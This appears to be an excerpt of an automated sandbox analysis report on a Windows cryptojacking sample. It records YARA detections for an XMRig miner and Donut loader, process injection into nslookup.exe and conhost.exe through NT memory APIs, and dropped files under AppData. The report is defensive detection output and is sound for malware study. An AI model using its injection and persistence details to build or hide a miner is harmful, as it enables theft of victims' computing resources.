              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
              Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: C:\Windows\System32\nslookup.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\boooba.exeCode function: 0_2_00401D58 NtAllocateVirtualMemory,0_2_00401D58
              Source: C:\Users\user\Desktop\boooba.exeCode function: 0_2_00401D18 NtWriteVirtualMemory,0_2_00401D18
              Source: C:\Users\user\Desktop\boooba.exeCode function: 0_2_004019D8 NtCreateThreadEx,0_2_004019D8
              Source: C:\Users\user\Desktop\boooba.exeCode function: 0_2_00401D98 NtProtectVirtualMemory,0_2_00401D98
              Source: C:\Users\user\Desktop\boooba.exeCode function: 0_2_00401C98 NtClose,0_2_00401C98
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 10_2_00401D58 NtAllocateVirtualMemory,10_2_00401D58
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 10_2_00401D18 NtWriteVirtualMemory,10_2_00401D18
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 10_2_004019D8 NtCreateThreadEx,10_2_004019D8
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 10_2_00401D98 NtProtectVirtualMemory,10_2_00401D98
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 10_2_00401C98 NtClose,10_2_00401C98
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_000001575946E1061_2_000001575946E106
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_000001575946E4D61_2_000001575946E4D6
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_000001575946E90E1_2_000001575946E90E
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_000001575946D4D21_2_000001575946D4D2
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_000001575946ED6A1_2_000001575946ED6A
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_00007FFD9B8A51061_2_00007FFD9B8A5106
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_00007FFD9B8A5EB21_2_00007FFD9B8A5EB2
              Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000299653048D614_2_00000299653048D6
              Source: C:\Windows\System32\conhost.exeCode function: 14_2_000002996530450614_2_0000029965304506
              Source: C:\Windows\System32\conhost.exeCode function: 14_2_000002996530516A14_2_000002996530516A
              Source: C:\Windows\System32\conhost.exeCode function: 14_2_0000029965304D0E14_2_0000029965304D0E
              Source: C:\Windows\System32\conhost.exeCode function: 14_2_00000299653038D214_2_00000299653038D2
              Source: C:\Windows\System32\conhost.exeCode function: 14_2_00007FFD9BAA4F5214_2_00007FFD9BAA4F52
              Source: C:\Windows\System32\conhost.exeCode function: 14_2_00007FFD9BAA41A614_2_00007FFD9BAA41A6
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
